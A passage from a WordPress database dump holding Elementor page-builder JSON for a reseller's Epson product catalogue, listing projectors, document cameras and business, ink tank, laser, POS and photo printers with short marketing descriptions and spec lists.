]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7874,3468,'_elementor_version','2.5.14'),(7877,3469,'_wp_page_template','template-fullwidth.php'),(7878,3469,'_elementor_edit_mode','builder'),(7879,3469,'_elementor_template_type','post'),(7880,3469,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-5\",\"right\":\"-5\",\"bottom\":\"-5\",\"left\":\"-5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"77\",\"bottom\":\"77\",\"left\":\"77\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 